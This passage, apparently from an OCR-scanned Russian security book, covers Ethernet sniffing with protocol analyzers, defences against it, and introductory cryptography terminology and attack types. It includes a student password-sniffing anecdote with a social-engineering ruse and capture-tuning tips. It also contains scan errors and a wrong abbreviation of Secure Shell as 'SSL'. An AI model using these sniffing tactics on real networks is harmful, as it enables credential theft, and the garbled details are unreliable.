В сети типа Ethernet подключенные к ней компьютеры, как правило, совместно используют один и тот же кабель, который служит средой для пересылки сообщений между ними. Если в комнате одновременно громко говорят несколько людей, разобрать что-либо из сказанного ими будет очень трудно. Когда по сети начинают "общаться" сразу несколько компьютеров, выделить из их "цифрового гвалта" полезную информацию и понять, кому именно она предназначена, практически невозможно. В отличие от человека, компьютер не может поднять руку и попросить тишины, поэтому для решения данной проблемы требуются иные, более сложные действия.

Компьютер сети Ethernet, желающий передать какое-либо сообщение по общему каналу, должен удостовериться, что этот канал в данный момент свободен. В начале передачи компьютер прослушивает несущую частоту сигнала, определяя, не произошло ли искажения сигнала в результате возникновения коллизий с другими компьютерами, которые ведут передачу одновременно с ним. При наличии коллизии компьютер прерывает передачу и "замолкает". По истечении некоторого случайного периода времени он пытается повторить передачу.

Если компьютер, подключенный к сети Ethernet, ничего не передает сам, он, тем не менее, продолжает "слушать" все сообщения, передаваемые по сети другими компьютерами. Заметив в заголовке поступившей порции данных свой сетевой адрес, компьютер копирует эти данные в свою локальную память.

Существуют два основных способа объединения компьютеров в сеть Ethernet. В первом случае компьютеры соединяются при помощи коаксиального кабеля. Этот кабель черной змейкой вьется от компьютера к компьютеру, соединяясь с сетевыми адаптерами Т-образным разъемом. Такая топология на языке профессионалов называется сетью Ethernet IOBase2. Однако ее еще можно назвать сетью, в которой "все слышат всех". Любой компьютер, подключенный к сети, способен перехватывать данные, посылаемые по этой сети другим компьютером.

Во втором случае каждый компьютер соединен кабелем типа витая пара с отдельным портом центрального коммутирующего устройства — концентратора или с коммутатора. В таких сетях, которые называются сетями Ethernet lOBaseT, компьютеры поделены на группы, именуемые доменами коллизий. Домены коллизий определяются портами концентратора пли коммутатора. замкнутыми на общую шину. В результате коллизии возникают не между всеми компьютерами сети, а по отдельности — между теми из них, которые входят в один и тот же домен коллизий, что повышает пропускную способность всей сети.

В последнее время в крупных сетях стали появляться коммутаторы нот но типа, которые не используют широковещание и не замыкают группы порки; между собой. Вместо этого все передаваемые по сети данные буферизуются в памяти и отправляются по мере возможности. Однако подобных сетей пока довольно мало — не более 10% от общего числа сетей типа Ethernet.

Таким образом, принятый в подавляющем большинстве Ethernet-сетей алгоритм передачи данных требует от каждого компьютера, подключенного к сети, непрерывного "прослушивания" всего без исключения сетевого трафика. Предложенные алгоритмы доступа, при использовании которых компьютеры отключались бы от сети на время передачи "чужих" сообщений, так и остались нереализованными из-за их чрезмерной сложности и малой эффективности.

Анализатор протоколов как он есть

Как уже было сказано, сетевой адаптер каждого компьютера в сети Ethernet как правило "слышит" все, о чем "толкуют" между собой его соседи по сегменту этой сети. Но обрабатывает и помещает в свою локальную память он ; только те порции (так называемые кадры) данных, которые содержат его уникальный сетевой адрес.

В дополнение к этому подавляющее большинство современных Ethernet-адаптеров допускают функционирование в особом режиме, называемом беспорядочным (promiscuous). При использовании данного режима адаптер копирует в локальную память компьютера все без исключения передаваемые по сети кадры данных.

Специализированные программы, переводящие сетевой адаптер в беспорядочный режим и собирающие весь трафик сети для последующего анализа, называются анализаторами протоколов. Администраторы сетей широко применяют анализаторы протоколов для осуществления контроля за работой  этих сетей и определения их перегруженных участков, отрицательно влияющих на скорость передачи данных. К сожалению, анализаторы протоколов используются и злоумышленниками, которые с их помощью могут перехватывать чужие пароли и другую конфиденциальную информацию.

Надо отметить, что анализаторы протоколов представляют серьезную опасность. Само присутствие в компьютерной сети анализатора протоколов указывает на то, что в ее защитных механизмах имеется брешь. Установить анализатор протоколов мог посторонний человек, который проник в сеть извне (например, если сеть имеет выход в Internet). Но это могло быть и делом рук доморощенного злоумышленника, имеющего легальный доступ к сети. В любом случае к сложившейся ситуации нужно отнестись со веси серьезностью.

Специалисты в области компьютерной безопасности относят атаки на компьютеры при помощи анализаторов протоколов к так называемым атакам второго уровня. Это означает, что компьютерный взломщик уже сумел проникнуть сквозь защитные барьеры сети и теперь стремится развить свой успех. При помощи анализатора протоколов он может попытаться перехватить регистрационные имена и пароли пользователей, их секретные финансовые данные (например, номера кредитных карточек) и конфиденциальные сообщения (к примеру, электронную почту). Имея в своем распоряжении достаточные ресурсы, компьютерный взломщик в принципе может перехватывать всю информацию, передаваемую по сети.

Анализаторы протоколов существуют для любой платформы. Но даже если окажется, что для какой-то платформы анализатор протоколов пока еще не написан, с угрозой, которую представляет атака на компьютерную систему при помощи анализатора протоколов, по-прежнему приходится считаться. Дело в том, что анализаторы протоколов исследуют не конкретный компьютер, а протоколы. Поэтому анализатор протоколов может обосноваться в любом узле сети и оттуда перехватывать сетевой трафик, который в результате широковещательных передач попадает в каждый компьютер, подключенный к сети.

Одна из первых атак, проведенных при помощи анализаторов протоколов, была зафиксирована в 1994 г. в США. Тогда неизвестный злоумышленник разместил анализатор протоколов на различных хостах и магистральных узлах сетей Internet и Milnet, в результате чего ему удалось перехватить более 100 тыс. регистрационных имен и паролей пользователей. Среди пострадавших от атаки оказались Калифорнийский государственный университет и Ракетная лаборатория министерства обороны США.

Наиболее частыми целями атак компьютерных взломщиков, которые те осуществляют, используя анализаторы протоколов, являются университеты. Хотя бы из-за огромного количества различных регистрационных имен и паролей, которые могут быть украдены в ходе такой атаки. Да и сами студенты отнюдь не брезгуют возможностями анализаторов протоколов. Нередким является случай, когда несколько студентов, заняв компьютер, подключенный к локальной сети университетской библиотеки, быстро устанавливают с нескольких дискет анализатор протоколов. Затем они просят ничего не подозревающую жертву, сидящую за соседним компьютером: "Вы не могли бы заглянуть в свой почтовый ящик, а то у нас почему-то электронная почта не работает?" Несколько минут спустя вся эта группа компьютерных взломщиков-любителей, перехватив регистрационное имя и пароль доступа соседа к почтовому серверу, с удовольствием знакомится с содержимым его почтового ящика и посылает письма от его имени.

Использование анализатора протоколов на практике не является такой уж легкой задачей, как это может показаться. Чтобы добиться от него хоть какой- то пользы, компьютерный взломщик должен хорошо знать сетевые технологии. Просто установить и запустить анализатор протоколов нельзя, поскольку даже в небольшой локальной сети из пяти компьютеров трафик составляет тысячи и тысячи пакетов в час. И следовательно, за короткое время выходные данные анализатора протоколов заполнят жесткий диск полностью.

Поэтому компьютерный взломщик обычно настраивает анализатор протоколов так, чтобы он перехватывал только первые 200—300 байт каждого пикета, передаваемого по сети. Обычно именно в заголовке пакета размешается информация о регистрационном имени и пароле пользователя, которые, как правило, больше всего интересуют взломщика. Тем не менее, если в распоряжении взломщика имеется достаточно пространства на жестком диске, то увеличение объема перехватываемого трафика пойдет ему только на пользу. В результате он может дополнительно узнать много интересного.

На серверах в сети Internet есть множество анализаторов протоколов, которые отличаются лишь набором доступных функций. Например, поиск по запросам protocol analyzer и sniffer на сервере www.softseek.com сразу лает ссылки на добрый десяток программных пакетов.

Для компьютеров, работающих под управлением операционных систем Windows, одними из лучших являются анатизаторы протоколов Lan Explorer компании Intellimax и NetXRay компании Network Associates. NetXRay (в переводе с английского — Сетевой рентген) обладает обширным набором функций, которые позволяют делать моментальный снимок "внутренностей" сети Ethernet, определять, какие ее узлы и сегменты несут наибольшую нагрузку, составлять отчеты и строить диаграммы на основе полученных данных. Бесплатная версия NetXRay доступна в Internet по адресу http://www.nai.com/asp_set/products/tnv/smflerbasic intro.asp. Анализатор протоколов Lan Explorer (в переводе с английского — Анализатор ЛВС) не уступает по своей функциональности NetXRay, имеет очень хороший пользовательский интерфейс, удобен и прост в использовании. Пробная 15-дневная версия Lan Explorer доступна по адресу

Анализатор протоколов Network Monitor входит в состав операционной системы Windows NT 4.0 Server корпорации Microsoft. Для его установки следует в Панели управления (Control Panel) дважды щелкнуть на пиктограмме Сеть (Network), затем перейти на вкладку Службы (Sen ice-, к нажать кнопку Добавить (Add) и в появившемся диалоговом окне выбран, Network Monitor Tools and Agent. После установки Network Monitor можно запустить из папки Network Analysis Tools раздела Администрирование (Administrative Tools) в меню Программы (Programs).

Защита от анализаторов протоколов

Надо сразу оговориться, что в советах относительно того, как защищаться от анализатора протоколов, нуждаются только те, кто желает дать отпор компьютерным взломщикам, использующим анализаторы протоколов для организации атак на компьютерные системы, подключенные к сети. В руках сетевого администратора анализатор протоколов является весьма полезным инструментом, помогающим находить и устранять неисправности, избавляться от узких мест, снижающих пропускную способность сети, и обнаруживать проникновение в нее компьютерных взломщиков.

Посоветовать можно следующее:

  • Обзаведитесь сетевым адаптером, который принципиально не может функционировать в беспорядочном режиме. Такие адаптеры в природе существуют. Одни адаптеры не поддерживают беспорядочный режим на аппаратном уровне (их меньшинство), а остальные просто снабжаются драйвером, не допускающим работу в беспорядочном режиме, хотя режим и реализован в них аппаратно. Чтобы отыскать адаптер, не поддерживающий беспорядочный режим, достаточно связаться со службой технической поддержки любой компании, торгующей анализаторами протоколов, и выяснить, с какими адаптерами их программные пакеты не работают.
  • Учитывая, что спецификация РС99, подготовленная по инициативе корпораций Microsoft и Intel, требует безусловного наличия в сетевой карте беспорядочного режима, приобретите современный сетевой интеллектуальный коммутатор, который буферизует каждое отправляемое по сети сообщение в памяти и отправляет его по мере возможности точно по адресу. В результате надобность в "прослушивании" сетевым адаптером всего трафика для того, чтобы выбирать из него сообщения, адресатом которых является данный компьютер, отпадает.
  • Не допускайте несанкционированной установки анализаторов протоколов на компьютеры сети. Для этого следует применять средства из арсенала, который повсеместно используется для борьбы с программными закладками и, в частности, — с троянскими программами.
  • Шифруйте весь трафик сети. Имеется широкий спектр программных пакетов, которые позволяют делать это достаточно эффективно и надежно.

Возможность шифрования почтовых паролей предоставляется надстройкой над почтовым протоколом POP (Post Office Protocol) — протоколом АРОР (Authentication POP). При работе с АРОР по сети каждый раз передается новая зашифрованная комбинация, которая не позволяет злоумышленнику извлечь какую-либо практическую пользу из информации, перехваченной с помощью анализатора протоколов. Проблема только в том, что не все почтовые серверы и клиенты поддерживают АРОР.

Другой продукт под названием Secure Shell, или сокращенно — SSL, был изначально разработан финской компанией SSH Communications Security (http://www.ssh.fi) и в настоящее время имеет множество реализаций, доступных бесплатно через Internet. SSL представляет собой защищенный протокол для осуществления безопасной передачи сообщений по компьютерной сети с помощью шифрования.

Особую известность среди компьютерных пользователей приобрела серия программных пакетов, предназначенных для защиты передаваемых по сети данных путем шифрования и объединенных присутствием в их названии аббревиатуры PGP, которая означает Pretty Good Privacy. Бесплатно распространяемые версии программ шифрования из этой серии можно отыскать в Internet по адресу http://www.pgpi.org.

 

Глава 5. Основы криптографии

Глава 5. Основы криптографии

1. Зачем нужна криптография

 

Зачем нужна криптография

Криптография бывает разная. Есть криптография, которая не позволяет вашему малолетнему сынишке насладиться созерцанием изображений обнаженной натуры, втайне переписанных вами ночью из сети Internet на домашний компьютер. Но кроме этого существует и криптография, которая не дает вашему правительству узнать про вас то, что вы не хотите, чтобы оно знало.

Если я напишу письмо, положу его в сейф, а сейф спрячу подальше от посторонних глаз и на спор попрошу вас прочесть мое письмо, — это не безопасность, а банальная игра в прятки. Но если я предоставлю вам свободный доступ не только к моему запертому сейфу, но и к сотне других подобных ему сейфов, к их ключевым комбинациям, позволю вам и лучшим взломщикам сейфов в мире во всех подробностях изучить конструкцию моего сейфа вместе с замком, но все равно никто не сможет открыть мой сейф и прочесть находящееся в нем письмо — вот это настоящая безопасность!

В течение многих лет такая криптография была прерогативой исключительно военных. Агентство национальной безопасности (АНБ) в США, а также соответствующие ведомства в Англии, России, и в других развитых странах тратили огромные деньги на обеспечение безопасности собственных линий связи и на добывание полезной информации из чужих. А простые граждане, не имея достаточных финансовых средств и не обладая необходимыми знаниями, были бессильны защитить свою частную жизнь от вмешательства со стороны государства.

  За последние 20 лет положение в корне изменилось. Этому способствовали чрезвычайно интенсивные научные исследования в области криптографии, которые привели к тому, что современная компьютерная криптография "обитает" не только в стенах строго охраняемых военных учреждении, но и на страницах общедоступных журналов, монографии и учебников. Теперь при желании кто угодно может зашифровать свои данные таким образом. чтобы защитить их от самого могущественного противника — правительственных ведомств, специализирующихся на краже информации.

Нуждается ли рядовой обыватель в подобной защите? Конечно, нуждается. Под ее прикрытием он может вести учет своих финансовых затрат, не опасаясь, что с ними ознакомятся налоговые службы. Он может разрабатывать новое изделие для последующей выгодной продажи на рынке, надежно пряча детали своей разработки от конкурентов. Он может завести любовницу и не бояться, что волей случая жена окажется посвященной в подробности его тайной любовной переписки. Ведь любой не застрахован от ситуации, котла он занимается какой-то деятельностью, которую он сам не считает незаконной, но которая впоследствии может быть объявлена кем-то вне закона. Каковы бы ни были причины, человек имеет право на частную жизнь, в том числе — на сохранение в тайне любых сведений, которые он сочтет нужным не предавать огласке. И никому, в том числе и государству, не должно быть до них никакого дела.

На практике все обстоит совершенно иначе. Своим Указом № 334 от 3 апреля 1995 г. президент России строго-настрого запретил "деятельность юридических и физических лиц, связанную с разработкой, производством, реализацией и эксплуатацией шифровальных средств, |...| предоставлением услуг в области шифрования информации", без государственных лицензий. А российские спецслужбы обязал "осуществлять выявление юридических и физических лиц, нарушающих требования настоящего Указа". Что с такими лицами будут делать — вырывать им ноздри или просто ставить клеймо на лоб, чтобы другим неповадно было, — в президентском Указе не сказано. Но и без этого у государственных чиновников в России появились все необходимые полномочия, чтобы при необходимости можно было воспрепятствовать внедрению надежных систем криптографической защиты информации. Надо сказать, что аналогично действует и американское правительство, которое путем введения государственного стандарта шифрования с передачей ключей на хранение пытается узаконить для себя право шпионить за своими гражданами.

Таким образом, становится совершенно очевидно, что надежность шифровальных средств — традиционно лишнее качество для "Большого брата", независимо от его национальной принадлежности. Совершенно в духе знаменитого романа "1984", принадлежащего перу английского писателя Джорджа Оруэлла, звучат аргументы сторонников введения ничем не ограниченного права государства на перехват информации частного характера. Они заявляют, что с человеком, которому есть что скрывать от собственного государства, происходит что-то неладное, поэтому к нему необходимо как следует присмотреться.

В любом демократическом государстве правоохранительным органам традиционно предоставлялась возможность на законных основаниях вести слежку, если разрешение на нее было получено в судебном порядке. Ныне этого недостаточно: правительства принуждают своих граждан самих принять все необходимые меры, чтобы можно было без помех вести за ними наблюдение. Тем самым государственная власть узурпирует права, которые в демократическом государстве должны принадлежать народу. И если в такой стране начнет править диктатор, его власть будет неограниченном. Свергнуть его будет невозможно, ибо любая попытка граждан объединиться вместе, чтобы противостоять диктатуре, станет ему известна. Настолько всемогущей является современная технология.

В связи с вышесказанным необходимо, чтобы все спецслужбы, которые обладают правом доступа к современным техническим средствам слежки зa гражданами своей страны, действовали в рамках законности и под контролем компетентных органов, подотчетных народу, ибо пересечь обратно границу, один раз перейденную в направлении от демократии к диктатуре, будет уже невозможно. Ведь даже в США — стране с самой развитой, по общему признанию, демократией в мире, никто не имеет достаточных гарантий того, что не разделит судьбу многих честных соотечественников, которые в разное время подвергались преследованию только потому, что по убеждения были неугодны властям.

Самая затяжная и беспощадная война нашего столетия ведется поразительно тихо. В ней обходятся без ракетно-бомбовых ударов и без расстрела заложников. Однако и здесь порочат, калечат и уничтожают людей точно так же, как и на обычной войне. А отвоевываются не чужие территории или право распоряжаться судьбами побежденных, а информация. И противостоят друг другу не "хорошие" и "плохие" парни, даже не озверевшие наемники. а государство и его граждане.

В информационной войне государство пользуется двумя основными видами оружия. Во-первых, в любую сертифицированную государством систему защиты информации встраивается так называемый потайной ход. который иногда еще именуют лазейкой. Еще в 1991 г. в сенат США был внесен законопроект, который требовал, чтобы любое американское криптографическое оборудование содержало потайной ход, известный АН Б. Поэтому совершенно не удивительно, что один из крупнейших разработчиков криптографического оборудования в США — компания AT&T — нисколько не скрывает того факта, что у американского правительства есть "ключики" "потайных ходов", ведущих во все ее системы вне зависимости от тою. насколько сложные пароли придумают неискушенные пользователи.

Второй способ обмана граждан является более изощренным и состоит в применении системы с депонированием ключей. В этом случае прочесть сообщение можно только при наличии всех частей ключа, использованного для засекречивания этого сообщения. Тайна переписки гарантируется до тех пор, пока государству не понадобится с ней ознакомиться. Тогда стоит заручиться согласием, скажем, тех доверенных лиц или организаций, которым были отданы на хранение части ключа, — и тайное станет явным. В США данный подход был подвергнут справедливой критике со стороны большинства специалистов, а корпоративные пользователи с негодованием отвергли саму идею довериться правительству в таком деликатном вопросе, как коммерческая тайна. И это в законопослушной Америке, где ставшие явными попытки спецслужб вторгнуться в частную жизнь своих граждан встречают немедленный и достойный отпор!

Из сказанного следует сделать один важный вывод. Недостаточно уметь защищать себя с помощью закона, непременно требуется еще и криптографическая защита. Шифрование играет слишком большую роль в современном мире, чтобы отдать его на откуп государству.

Криптографические средства можно объявить вне закона. Но ваша личная информация всегда будет легальной, и, следовательно, должна быть надежно защищена от посторонних.

 

2. Терминология

Терминология

Шифрование и расшифрование

Предположим, что отправитель хочет послать сообщение получателю. Более того, отправитель желает засекретить это сообщение, чтобы никто, кроме получателя, не смог его прочитать.

Сообщение состоит из открытого текста. Процесс преобразования открытого текста с целью сделать непонятным его смысл для посторонних называется шифрованием. В результате шифрования сообщения получается шифр-текст. Процесс обратного преобразования шифртекста в открытый текст называется расшифрованием.

Наука, которая учит, как следует поступать, чтобы сохранить содержание сообщений в тайне, называется криптографией. Людей, занимающихся криптографией, зовут криптографами. Криптоаналитики являются специалистами в области криптоанализа — науки о вскрытии шифров, которая отвечает на вопрос о том, как прочесть открытый текст, скрывающийся пол шифрованным. Раздел науки, объединяющий криптографию и криптоанализ, именуется криптологией.

Обозначим открытый текст буквой Р (от английского слова plaintext). Это может быть текстовый файл, битовое изображение, оцифрованный звук — что угодно. Единственное ограничение связано с тем, что, поскольку, прел метом изложения является компьютерная криптография, под Р понимание;; исключительно двоичные данные.

Шифртекст обозначается буквой С (от английского слова ciphertext) и также представляет собой двоичные данные. Объем полученного шифртекста иногда совпадает с объемом соответствующего открытого текста, а иногда превышает его. После зашифрования преобразованный открытый текст может быть передан по каналам компьютерной сети или сохранен в памяти компьютера.

На вход функции шифрования Е подается Р, чтобы на выходе получить С.

В обозначениях, принятых в математике, это записывается как:

Е(Р) = C

При обратном преобразовании шифртекста в открытый текст на вход функции расшифрования D поступает С, а на выходе получается Р:

D(C) = М

Поскольку смысл любого криптографического преобразования открытого текста состоит в том, чтобы потом этот открытый текст можно было восстановить в первозданном виде, верно следующее соотношение:

D(E(P)) = Р

Аутентификация, целостность и неоспоримость

Помогая сохранить содержание сообщения в тайне, криптография может быть использована, чтобы дополнительно обеспечить решение следующих задач:

  • Аутентификация. Получателю сообщения требуется убедиться, что оно исходит от конкретного отправителя. Злоумышленник не может прислан, фальшивое сообщение от чьего-либо имени.
  • Целостность. Получатель сообщения в состоянии проверить, были ли внесены какие-нибудь изменения в полученное сообщение в ходе его передачи. Злоумышленнику не позволено заменить настоящее сообщение на фальшивое.
  • Неоспоримость. Отправитель сообщения должен быть лишен возможности впоследствии отрицать, что именно он является автором этого сообщения.

Перечисленные задачи часто приходится решать на практике для организации взаимодействия людей при помощи компьютеров и компьютерных сетей. Подобные же задачи возникают и в случае личностного человеческого общения: часто требуется проверить, а действительно ли ваш собеседник тот, за кого он себя выдает, и подлинны ли предъявленные им документы. будь то паспорт, водительское удостоверение или страховой полис. Вот почему в обыденной жизни не обойтись без аутентификации, проверки целостности и доказательства неоспоримости, а значит и без криптографии.

Шифры и ключи

Криптографический алгоритм, также называемый шифром или алгоритмом шифрования, представляет собой математическую функцию, используемую для шифрования и расшифрования. Если быть более точным, таких функций две: одна применяется для шифрования, а другая — для расшифрования.

Когда надежность криптографического алгоритма обеспечивается за счет сохранения в тайне сути самого алгоритма, такой алгоритм шифрования называется ограниченным. Ограниченные алгоритмы представляют значительный интерес с точки зрения истории криптографии, однако совершенно непригодны при современных требованиях, предъявляемых к шифрованию. Ведь в этом случае каждая группа пользователей, желающих обмениваться секретными сообщениями, должна обзавестись своим оригинальным алгоритмом шифрования. Применение готового оборудования и стандартных программ исключено, поскольку тогда любой сможет приобрести это оборудование и эти программы и ознакомиться с заложенным в них алгоритмом шифрования. Придется разрабатывать собственный криптографический алгоритм, причем делать это надо будет каждый раз, когда кто-то из пользователей группы захочет ее покинуть или когда детали алгоритма случайно станут известны посторонним.

В современной криптографии эти проблемы решаются с помощью использования ключа, который обозначается буквой К (от английского слова key). Ключ должен выбираться среди значений, принадлежащих множеству, которое называется ключевым пространством. И функция шифрования Е, и функция расшифрования D зависят от ключа. Сей факт выражается присутствием К в качестве подстрочного индекса у функций Е и D:

Е к (Р) = С

D к (С) = Р

По-прежнему справедливо следующее тождество:

D k (E k (P)) = P

Некоторые алгоритмы шифрования используют различные ключи для шифрования и расшифрования. Это означает, что ключ шифрования К 1 отличается от ключа расшифрования К 2 . В этом случае справедливы следующие соотношения:

Е к 1 ( P ) = С

D k2 (С) = Р

D k2 (E k1 (Р) ) = Р

Надежность алгоритма шифрования с использованием ключей достигается., за счет их надлежащего выбора и последующего хранения в строжайшем секрете. Это означает, что такой алгоритм не требуется держать в тайне. Можно организовать массовое производство криптографических средств, основу функционирования которых положен данный алгоритм. Знание криптографического алгоритма не позволит злоумышленнику прочесть зашифрованные сообщения, поскольку он не знает секретный ключ, использованный для их зашифрования.

Под криптосистемой понимается алгоритм шифрования, а также можно всевозможных ключей, открытых и шифрованных текстов.

Симметричные алгоритмы шифрования

Существуют две разновидности алгоритмов шифрования с использованием ключей — симметричные и с открытым ключом. Симметричным называют криптографический алгоритм, в котором ключ, используемый для шифрования сообщений, может быть получен из ключа расшифрования и наоборот. В большинстве симметричных алгоритмов применяют всего один ключ. Такие алгоритмы именуются одноключевыми, или алгоритмами с секретным ключом, и требуют, чтобы отправитель сообщений и их получатель и рапсе условились о том, каким ключом они будут пользоваться. Надежность одноключевого алгоритма определяется выбором ключа, поскольку его значение дает возможность злоумышленнику без помех расшифровывать все перехваченные сообщения. Поэтому выбранный ключ следует хранить в тайне от посторонних.

Шифрование и расшифрование в симметричных криптографических алгоритмах задаются уже знакомыми формулами:

Е к (Р) = С

D к (С) = Р

Симметричные алгоритмы шифрования бывают двух видов. Одни из них обрабатывают открытый текст побитно. Они называются потоковыми алгоритмами, или потоковыми шифрами. Согласно другим, открытый текст разбивается на блоки, состоящие из нескольких бит. Такие алгоритмы называются блочными, или блочными шифрами. В современных компьютерных алгоритмах блочного шифрования обычно длина блока составляет 64 бита.

Алгоритмы шифрования с открытым ключом

Алгоритмы шифрования с открытым ключом, также называемые асимметричными алгоритмами шифрования, устроены так, что ключ, используемый для шифрования сообщений, отличается от ключа, применяемого для их расшифрования. Более того, ключ расшифрования не может быть за обозримое время вычислен , ходя из ключа шифрования. Свое название алгоритмы с открытым ключом получили благодаря тому, что ключ шифрования не требуемся держать в тайне. Любой может им воспользоваться, чтобы зашифровать свое сообщение, но только обладатель соответствующего секретного ключа расшифрования будет в состоянии прочесть это шифрованное сообщение. Ключ шифрования обычно называют открытым ключом, а ключ расшифрования — тайным ключом. Иногда тайный ключ называют также секретным, однако чтобы избежать путаницы с симметричными алгоритмами, это название не будет использоваться при дальнейшем изложении.

Несмотря на юг факт, что сообщения шифруются с помощью открытого ключа, а расшифровываются с помощью тайного ключа, процесс шифрования и расшифрования все равно записывается так:

Е k (Р) - С

D к (С) = Р

Иногда сообщения шифруются с использованием тайного ключа, а расшифровываются посредством открытого ключа. Несмотря на возможную путаницу, этот факт математически по-прежнему выражается в виде:

Е к (Р) = С

D k (C) = Р

Криптоаналитические атаки

Криптография ставит своей целью сохранение переписки в тайне от посторонних людей, которые захотят с ней ознакомиться. Таких людей криптографы называют злоумышленниками, противниками, перехватчиками или просто врагами. При этом предполагается, что они могут перехватывать любые сообщения, которыми обмениваются отправитель и получатель.

Криптоанализ заключается в получении доступа к открытому тексту шифрованного сообщения. В ходе успешного криптоаналитического исследования криптосистемы может быть найден не только открытый текст, но и сам ключ. Криптоаналитик занимается поисками слабостей в криптосистеме, которые могут позволить ему прочесть шифрованное сообщение, или отыскать ключ, или и то, и другое вместе. Если противник узнал ключ не с помощью криптоанализа, а каким-то другим способом (выкрал или купил), то говорят, что ключ был скомпрометирован.

Попытка криптоанализа называется атакой. Успешная криптоаналитическая атака зовется взломом, или вскрытием.

В современной криптологии принято считать, что надежность шифра определяется только секретностью используемого ключа. Правило, впервые сформулированное голландцем А. Керкхоффом (1835—1903), гласит о том, что весь механизм шифрования, за исключением значения ключа, предположительно известен противнику. Это предположение является довольно естественным. Например, хотя ФАПСИ вряд ли знакомит АНБ со своими криптографическими алгоритмами, какое-то представление о них там вес равно имеется. Следовательно, правило Керкхоффа является относительно хорошим допущением при рассмотрении надежности алгоритмов шифрования. Если шифр невозможно взломать, зная абсолютно все детали алгоритма шифрования, значит это тем более нельзя сделать, не обладая подобными знаниями во всей их полноте.

Известны 4 основных типа криптоаналитических атак. При рассмотрении каждой из них подразумевается, что криптоаналитик в курсе всех детален подвергаемого криптоанализу алгоритма шифрования.

1. Атака со знанием только шифртекста. В распоряжении криптоанадитпка имеются несколько сообщений, которые были зашифрованы с использованием одного и того же алгоритма шифрования. Задача криптоаналитика состоит в нахождении открытого текста наибольшего числа перехваченных сообщений. Он может также попытаться найти ключи, которые применялись для шифрования этих сообщений, чтобы потом прочесть другие сообщения, зашифрованные с использованием тех же ключей.

Дано:

С 1 = E k1 (P 1 ),    С 2 = E k2 (P 2 ),...,      С i = E ki (P i ).

Найти:

P 1 , P 2 , ..., Р i или К 1 , К 2 , ..., K i .

2. Атака со знанием открытого текста. Криптоаналитик имеет доступ не только к шифрованным текстам нескольких сообщений, но и знает их открытые тексты. От него требуется найти ключи, которые использовались для шифрования этих сообщений.

Дано:

P 1 , C 1 = E k1 (P 1 ),   P 2 , C 2 = E k2 (P 2 ),...,  P i , C i = E ki (P i ).  

Найти:

K 1 , K 2 , . . , K i .

3. Атака с выбранным открытым текстом. Криптоаналитик не только знает шифрованные и открытые тексты нескольких сообщений, но и может определять содержание этих сообщений. Данная разновидность крипто-аналитической атаки является более мощной по сравнению с атакой со знанием открытого текста, поскольку здесь криптоаналитик может по своему усмотрению выбирать открытый текст, подлежащий зашифрованию, и, тем самым, получать больше информации об используемых ключах. Его задача по-прежнему состоит в нахождении ключей.

Дано:

P 1 , C 1 = E k 1 (P 1 ),   P 2 , C 2 = E k 2 (P 2 ),...,  P i ,   

где С i  = Е к i ( P i ), где P 1 , P 2 ,. . . , Pi выбраны криптоаналитиком.

Найти: К 1 , К 2 , . . . , K i .

4. Адаптивная атака с выбранным открытым текстом. Эта атака является разновидностью атаки с выбранным открытым текстом. Криптоаналитик не только выбирает открытые тексты посылаемых шифрованных сообщений, но и может менять свой выбор в зависимости от результатов их шифрования.

Имеются по крайней мере еще 3 разновидности криптоаналитических атак.

1. Атака с выбранным шифртекстом. Криптоаналитику предоставлена возможность выбора шифртекстов, подлежащих расшифрованию получателем. Он также имеет доступ к соответствующим открытым текстам. Требуется найти ключи.

Дано:

С 1 , P 1 = D k1 ( C 1 ) ,    С 2 , P 2 = D k2 ( C 2 ) , ...,  С i , P i = D ki ( C i ).

Найти :

K 1 , K 2, . . . , K i . Этой криптоаналитической атаке, как правило, подвергаются алгоритмы шифрования с открытым ключом. Хотя иногда она эффективна и против симметричных криптосистем. Атаку с выбранным открытым текстом и с выбранным шифртектом называют атакой с выбранным текстом.

2. Атака с выбранным ключом. В ходе этой атаки криптоаналитик обладает некоторыми знаниями относительно правил, по которым отправитель и получатель сообщений выбирают ключи шифрования.

3. Атака с применением грубой силы. Криптоаналитик занимается подкупом, шантажом или пытками, чтобы получить сведения, необходимые ему для взлома криптосистемы. Подкуп иногда выделяют в отдельную категорию и называют атакой с покупкой ключа. Эти атаки являются очень эффективными и зачастую предоставляют наиболее легкий путь для получении доступа к открытым текстам шифрованных сообщений.

Атаки со знанием открытого текста и с выбранным открытым текстом не так уж редко встречаются на практике, как можно подумать. Известны случаи, когда криптоаналитику удавалось подкупить шифровальщика, чтобы он зашифровал сообщение, открытый текст которого известен криптоаналитику. Иногда даже не требуется никого подкупать, поскольку открытые тексты многих сообщений начинаются и заканчиваются стандартными фразами.

С этой точки зрения зашифрованная программа на языке С особенно уязвима, поскольку содержит множество зарезервированных слов типа # define, # include, if, then и do.

Не следует забывать и о правиле Керкхоффа. Попытка добиться высоко-надежности криптографического алгоритма за счет сохранения в тайне принципов его работы является малопродуктивной. Криптоаналитпк может выполнить дизассемблирование любой сверхсложной программы шифрования и методом обратного проектирования воспроизвести алгоритм, положенный в основу ее функционирования. Такое случается довольно част. Лучшие алгоритмы шифрования являются общественным достоянием уже в течение многих лет, и над их взломом продолжают безуспешно трудиться самые способные криптоаналитики в мире.

Надежность алгоритма шифрования

Различные криптографические алгоритмы обладают разной надежностью, чаще называемой стойкостью алгоритма шифрования или стойкостью шифра. Стойкость зависит от того, насколько легко криптоаналитик может взломам, шифр. Если при этом стоимость затрат превышает ценность полученной в 4 результате информации, то владельцу этого шифра, возможно, и беспокоиться не о чем. Если время, потраченное на взлом шифра, больше, чем период, и течение которого ваши данные должны храниться в секрете, то они вероятно вне опасности. Если противник не накопил достаточного количества ваших сообщений, зашифрованных с помощью одного ключа, чтобы суметь определить этот ключ, время его менять, может быть, еще и не пришло.

Слова "может быть", "вероятно" и "возможно" употреблены здесь не зря. Ведь всегда существует шанс, что в криптоанализе произойдут революционные изменения. Свести к минимуму вредные последствия очередного такого прорыва поможет соблюдение простого правила: ценность секретных данных должна быть всегда ниже, чем стоимость преодоления защитных средств, используемых для сохранения этих данных в тайне.

Под вскрытием (взломом) шифра обычно понимается решение одной из перечисленных ниже задач:

  • Полное вскрытие. Криптоаналитик нашел ключ К такой, что D K (C)=P.
  • Глобальная дедукция. Не зная К, криптоаналитик отыскал адьтернативный D k алгоритм А такой, что А(С) = Р.
  • Локальная дедукция. Криптоаналитику удалось определить открытый текст, соответствующий конкретному перехваченному шифртексту.
  • Частичная дедукция. Криптоаналитик получил неполную информацию о ключе или открытом тексте. Это могут быть несколько битов ключа, или. дополнительные данные о структуре открытого текста, или что-то еще в том же духе.

